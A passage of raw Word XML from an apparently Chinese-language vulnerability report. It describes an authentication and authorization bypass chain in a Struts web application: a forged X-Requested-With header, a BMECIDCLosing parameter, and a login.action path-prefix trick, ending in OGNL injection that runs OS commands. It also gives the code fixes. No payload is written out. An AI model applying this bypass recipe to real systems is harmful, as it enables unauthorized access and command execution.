              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F3137B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户认证记录模块，检测到该请求是</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F3137B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ajax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F3137B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求（伪造http头部</w:t>
            </w:r>
            <w:r w:rsidRPr="00F3137B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Requested-With: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F3137B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>XMLHttpRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），跳过用户认证的记录部分；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户权限控制模块检测到</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入参数中存在</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BMECIDCLosing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>变量，误以为是页面关闭事件，跳过权限检查；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00F3137B" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在TOKEN检查类中，检查</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>路径以</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>login.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开头，误以为该请求是白名单中的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>login.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，跳过Token检查；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="00D63C4F" w:rsidRDefault="001E63E4" w:rsidP="001E63E4">
            <w:pPr>
              <w:pStyle w:val="af5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>非法用户最终成功</w:t>
            </w:r>
            <w:r w:rsidR="00917738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过系统的访问控制并且利用了</w:t>
            </w:r>
            <w:r w:rsidR="00917738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>struts</w:t>
            </w:r>
            <w:r w:rsidR="00917738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00917738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ognl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00917738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入漏洞执行了</w:t>
            </w:r>
            <w:r w:rsidR="00917738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OS</w:t>
            </w:r>
            <w:r w:rsidR="00917738">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="00546FA0" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="852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E63E4" w:rsidRPr="00546FA0" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00546FA0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>对业务的影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidRPr="008739CF" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001E63E4" w:rsidRDefault="00747755" w:rsidP="00303753">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>利用该漏洞，攻击者可以绕过该系统的认证和鉴权机制</w:t>
            </w:r>
            <w:r w:rsidR="001E63E4">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，执行非法操作。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E63E4" w:rsidRPr="008739CF" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidTr="003F3408">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="852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E63E4" w:rsidRDefault="001E63E4" w:rsidP="00303753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>解决方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E63E4" w:rsidTr="00303753">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在获取</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>时，将</w:t>
            </w:r>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>request.getRequestURI</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>替换为：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C351EF" w:rsidRDefault="00C351EF" w:rsidP="00C351EF">
            <w:pPr>
              <w:pStyle w:val="af9"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>request.getContextPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()+</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>request.getServletPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C351EF" w:rsidRDefault="00C351EF" w:rsidP="00C351EF">
            <w:pPr>
              <w:pStyle w:val="af9"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pathInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>request.getPathInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C351EF" w:rsidRDefault="00C351EF" w:rsidP="00C351EF">
            <w:pPr>
              <w:pStyle w:val="af9"/>
            </w:pPr>
            <w:r>
              <w:t>if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pathInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> != null) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C351EF" w:rsidRDefault="00C351EF" w:rsidP="00C351EF">
            <w:pPr>
              <w:pStyle w:val="af9"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pathInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRDefault="00C351EF" w:rsidP="00C351EF">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF17CD" w:rsidRDefault="00FF17CD" w:rsidP="00C351EF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FF17CD" w:rsidRDefault="00FF17CD" w:rsidP="00C351EF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>对</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>logout.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的访问需要先进行认证判断（在访问</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>logout.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>时先校验会话信息）</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF17CD" w:rsidRPr="005B620B" w:rsidRDefault="00FF17CD" w:rsidP="00C351EF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在判断</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>login.action</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>时，采用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>精确匹配方案（</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>requestURI</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中不能带入</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ContextPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>将</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>requestURI.startsWith</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>loginURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>改为</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>requestURI.equals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>loginURL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B620B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005B620B" w:rsidRPr="005B620B" w:rsidRDefault="005B620B" w:rsidP="005B620B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
